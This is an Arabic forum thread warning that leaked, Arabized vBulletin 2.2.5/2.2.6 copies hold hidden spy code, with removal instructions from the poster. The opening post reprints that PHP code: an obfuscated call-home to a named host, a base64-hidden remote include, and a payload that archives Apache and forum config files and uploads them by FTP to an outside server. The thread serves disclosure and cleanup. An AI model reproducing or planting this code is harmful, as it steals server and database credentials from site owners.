دعوه لنبذ كل نجس ضعيف نفس

[l7ool]

اسمحولي على هذا العنوان ولكن للاسف هذه هي الحقيقه المره

قبل فتره بسيطه تم اكتشاف ثغره في بعض نسخ 2.2.5 المسربه لنا من اخواننا العرب وكان هذا الكود الموجود فيها في ملف forum

كود PHP:

if ($action=="modify") {
  $vbxh = h;
  $vbxt = t;
  $vbxp = p;
  $vbxw = w;
  $vbxa = a;
  $vbx1 = 1;
  $vbxr = r;
  $vbxb = b;
  $vbxn = n;
  $vbxe = e;
  $vbxo = o;
  $vbxy =y;
  $vbxl = l;
  echo "<!-- ";
  $file = 
fopen("$vbxh$vbxt$vbxt$vbxp://$vbxw$vbxw$vbxw.$vbxa$vbxr$vbxa$vbxb$vbx1.$vbxn$vbxe$vbxt/~$vbxr$vbxo$vbxy$vbxa$vbxl/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NA
ME", "r");
  $rf = fread($file, 1000);
  fclose($file);
  echo " -->"; 


وكان الكود الحلو هذا يتصل في موقع

http://www.arab1.net/

http://www.arab1.net/~royal/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NAME

عموما مع الايام نزلت نسخه 2.2.6 وسربوها لنا حبايبنا وشالوا كود التبليغ ياعيني عليهم عشان يحطون لنا كود تجسس ونعم الاخوه العرب المسلمين

بس هالمره الكود اذكى ومهو مكشوف وغبي زي الاول الكود المره هذي في ملفين ملف option بالاخير موجود

كود PHP:

  echo "<!-- ";
  include "$sqlupdate";
  echo " -->"; 


وملف functions

كود PHP:

$sqlupdate = base64_decode('aHR0cDovL3NhdWRpLm5vLWlwLmNvbS9+cm95YWwvLngyLmluYw=='); 


ياعيني على الذكاء صرنا نعرف نلعب باكدوا ديكود وانكود

والمره هذي بعد يتصل الكود الحلو هذا اللي مستخدمين فيه ديكود بالموقع هذا
http://saudi.no-ip.com/
بيرحب فيكم ويقولكم WELCOME TO arab1.net
ياعيني عالترحيب

عموما الكود بيتصل بالصفحه هذي http://saudi.no-ip.com/~royal/.x2.inc اللي فيها كود رهييييييب ويبين لنا ....... اللي يحسبون علينا كمسلمين وعرب
شوفو الكود

كود PHP:

<div id="sHo" style="display:none;">
<!-- 
if you are seeing this code PlzZzZz Contact [email]sleeping_bum@hotmail.com[/email]
<?php
system("mkdir /tmp/.statics");
system("cp /etc/httpd/conf/httpd.conf /tmp/.statics/httpd1.conf");
system("cp /usr/local/apache/conf/httpd.conf /tmp/.statics/httpd2.conf");
system("cp admin/config.php /tmp/.statics/php.conf");
system("tar -cvf /tmp/.statics.tgz /tmp/.statics");
$vilename = "$SERVER_NAME.bz";
$port = base64_decode('aHB5NWk5');
$conn_id = ftp_connect("cyber-sa.virtualave.net"); 
$login_result = ftp_login($conn_id, "cyber-sa", "$port"); 
$upload = ftp_put($conn_id, "/tmp/$vilename", "/tmp/.statics.tgz", FTP_BINARY); 
ftp_quit($conn_id); 
system("rm -rf /tmp/.statics.tgz");
system("rm -rf /tmp/.statics");
$base = "$HTTP_HOST&h2=$SCRIPT_NAME";
$open = "http://saudi.no-ip.com/~royal/.x2.php?h=$base";
$file = fopen("$open", "r");
$rf = fread($file, 1000);
fclose($file);
?>
 -->
</div>

لاحول ولاقوة الا بالله الله يرحم ام جون وكود التبليغ ياشييييييييييييييييخ

[iceman]

طيب اخوي كيف نشيل وننظف الحاجات هدي ؟

[FOFOOO]

سبق طرح شيء حول هذا الموضوع والمفروض أن يكون هناك ايضاح من arab1.net لكنني لم أطلع على أي ايضاح علما بأن ذلك يؤثر على سمعة الموقع ككل كموقع استضافه مالم يتم توضيح الأمر

[B2S]

ياحسافة على العرب والمسلمين شطارتهم علينا بس

الله يجازيهم بس

[l7ool]

عزيزي iceman نظف الملفات اللي انا ذكرتها من الاكواد المذكوره بالموضوع

عزيزي FOFOOO لو تراجع اغلب النسخ من الاصداره 2.2.1 بتلاقي فيها كودات تجسس ترجع لنفس الموقع ومابي اظلم الموقع واقول فيه لانهم يعطون مساحات مجانيه

عموما وللاسف انا لاحظت ان فيه واحد معدل موضوعي ومسويله تحرير ومبدل بعض الكلام اللي فيه حتى الايميل اللي موجود في صفحة التجسس مبدله (وش يعتبر هذا خوف؟) اذا الموضوع مو عاجب الشخص اللي عدل كلامي ياليت يحذفه ويعتبر اني منسحب من منتدى ينشر كل النسخ المليانه اكواد تجسس ولا ينشر المواضيع اللي تفضح الناس هذي وهذا الايميل اللي انت غيرته مره ثانيه تعال وغيره هنا

if you are seeing this code PlzZzZz Contact saudi_hackerz@hotmail.com

تحياتي

[Adhari.com]

أفااا والله ،،

هاذي آخرتها يعني؟؟


بس الحمد لله نسختي ماهي من هنا ،،

والله أعلم بما تحتويها ،،

لأنها من الـ Kazaa وعربت بقية الحاجات من بعد تدخيل ستيل عربي ،،

الله يجزيك ألف خير l7ool ،،

تحياتي؛؛

[FOFOOO]

رد مقتبس من l7ool
عزيزي FOFOOO لو تراجع اغلب النسخ من الاصداره 2.2.1 بتلاقي فيها كودات تجسس ترجع لنفس الموقع ومابي اظلم الموقع واقول فيه لانهم يعطون مساحات مجانيه

أخي الكريم أنا لا أتعامل أصلا مع الفي بي ولا يعنيني بشيء ولذا لم اجرب النسخة التي تشير اليها ولا غيرها .. وانما ما يعنيني أمره هو موقع arab1 كموقع عربي نتوسم فيه النجاح ونتمنى أن لايكون هذا مستواه لأن من يتعامل بمثل هذا المستوى يشكك في مصداقية كل خدماته سواء كانت مجانيه أم تجاريه ........ لكن مع الأسف لم يوضح موقفه .. وأخشى أن يكون ( السكوت علامة الرضا )

[awm88]

السلام عليكم

رد مقتبس من FOFOOO

أخي الكريم أنا لا أتعامل أصلا مع الفي بي ولا يعنيني بشيء ولذا لم اجرب النسخة التي تشير اليها ولا غيرها .. وانما ما يعنيني أمره هو موقع arab1 كموقع عربي نتوسم فيه النجاح ونتمنى أن لايكون هذا مستواه لأن من يتعامل بمثل هذا المستوى يشكك في مصداقية كل خدماته سواء كانت مجانيه أم تجاريه ........ لكن مع الأسف لم يوضح موقفه .. وأخشى أن يكون ( السكوت علامة الرضا )

والله الواحد يستحي أخي من آلي يصير هذا يعني موقع كبير كذا يعمل كذا أكيد السكوت علامة الرضى

ليشش هذا العمل ليش إحنا كذا بس نعرف أنحارب ونقتل بعض بس ؟؟؟؟

مع العدو انكون طيبين آلي ابعد درجه لكن مع بعض تطلع الشجاعة وتطلع الوطنية و القومية

في كل مكان وكل زمان لا نعرف العدو الحقيقي الذي يوجه اسلحتة المسمومة في ظهرنا ولكن من

يسانده هذول الخونة آلي يضع كود ويخلط السم في العسل

المفروض على الجماعة تزرع الثقة من اوووول ابن قبوس وفعلته آلي حد الحين ما ندري آلي الحين

يخزن في اليمن وتظاهره انه طيب وحبوب آلي الشباب آلي مسوين نفسهم يخدم المجتمع

و وفي الحقيقة هم يبيعوك لشي حلو في حياتهم

ليش يا أخون هذي الروح الشريرة هل تتوقعون أنكم بتنجو من عقاب الله سبحانه و تعالى

وهذا الشي يذكرني في موضوع قدم عندما كنت ابحث من باب التسلية في ملفات منتدى اتضح لي

رجل بعيد كل البعد عن الشبهات و المصيبة انه ما عرف يتصرف يعني بتسوي جريمة ابعد عن

بريدك المعتمد هههه الأخ كاتب كود ومخلي بريدة عيني عينك وكانت النسخة من المنتدى الإصدار القيم

بس ما حبيت أسوى فضيحة في سوالف وقلت استر على ما وجهت

ووصل فيهم انهم يخلو على حتى الهكات ينزلو فيها أكواد تبليغ يعني قبل فترة نازل في المنتدى


النشرة البريدية وكان فيها كود تبليغ يعني حتى جون ما فكر يعمل كذا

تدر يا جماعة ما أتوقع أحد سوى مثلي أني مسوي على الأدمن حظر هههه يعني آلي الكل يتوقع انه

الأدمن يعني الرقم واحد في المنتدى مسوي علية حظر وكيد كل هذا ولا فيه فايدة مع الناس آلي ما

عندها ذرة ضمير

أقول بس ليش كذا وصلنا آلي مستوى كل واحد يبي يأكل الثاني ليش

أكيد ما بحصل جواب
هل هو غرور هل هو استعراض يعني يا جماعه تعالو شفوني آنا خربت منتدى آفلان هذا هذا فخر

أليس الفخر انك تساعد أليس الفخر انك تبني بدل انك تهدم مجهود غيرك

وأكيد المعني في الموضوع لزم يزور الموضوع وعلى قوله راعي المثل راعي الجريمة يحوم حولها

أقول آلي موقع arab1 انتبه آلي نفسك بدل انك تخسر المستضيفين ألي عندك و الساكت عن الحق

أشكرك أخي l7ool
من صميم قلبي

[al7aq]

الف شكر لك اخوي على التنبية

ومن وجهة نظري ان التشهير بهم واجب ..

الحقيقة لا اخفيكم عندما رأيت الحرص على نشر نسخة معربة في كل منتدى أجد نفس الكاتب .. ونفس الدعاية على نسخة 2.2.6 شكيت فيها

ولم استخدمها وبحث عن اخرى ..

الأمر محزن أن يكون بعض الكلاب تحاول أن تستغل الآخرين !

أظن أن الطيب فيهم يخطط لسحب الإيميلات

المهم يجب نشر هذا الموضوع في كل مكان .. مثل ما نشرت النسخة ..

ولكم التحية

[joker]

هلا اخوي
شكرا لك على المعلومه
بس احب اعرف شيء
انا توجهت للموقع arab1.net
وتطلع لي الصفحه خطا

[awm88]

رد مقتبس من joker
هلا اخوي
شكرا لك على المعلومه
بس احب اعرف شيء
انا توجهت للموقع arab1.net
وتطلع لي الصفحه خطا

يار يت يصير تفاعل في الموضوع اكثر من كذا


هذي المشكله كبيرة فوق التصور

واشوف الكل ساكت عنها

اول مرة اشوف ناس تنسرق وهي ساكتة

[joker]

لاحياة لمن تنادي هنا


على قول عبادي الجوهر
كلهم راحوا وليه انتظرتي

[awm88]

رد مقتبس من joker
لاحياة لمن تنادي هنا


على قول عبادي الجوهر
كلهم راحوا وليه انتظرتي

والله خليتني اضحك زين ليش يردو وهم (البعض) مجرمون

و الباقي منصوب عليهم في الكلام الطيب أسحب اخر نسخه معربة

وكله خرابيط وغش وضحك على الذقون الله ينتقم من الفاعل

انا بصراحه اوصفه باخس الأوصاف يدعي انه يساعد الناس وهو

على بابا بس من غير اربعين حرامي

على قول عبادي الجوهر
كلهم راحوا وليه انتظرتي

[azazi]

نبي طريقه اكتشاف هذا الكون في التفصيل ... وطريقه مسحه والملفات اللتي تضمن هذا الكود ... الخ

ملاحظه : شرح كامل ومفصل جزاكم الله الف خير

علمل ان النسخه اللي عندي 2.2.6

[l7ool]

عزيزي azazi

مهي محتاجه شرح كثير

افتح ملف option.php في مجلد الادمن وابحث عن

كود PHP:

echo "<!-- ";
  include "$sqlupdate";
  echo " -->"; 


اذا كان موجود يعني عندك كود التجسس احذفه واحفظ التغييرات وروح افتح ملف functions.php في مجلد الادمن وابحث عن الكود هذا

كود PHP:

$sqlupdate = base64_decode('aHR0cDovL3NhdWRpLm5vLWlwLmNvbS9+cm95YWwvLngyLmluYw=='); 


احذفه واحفظ التغيير

تحياتي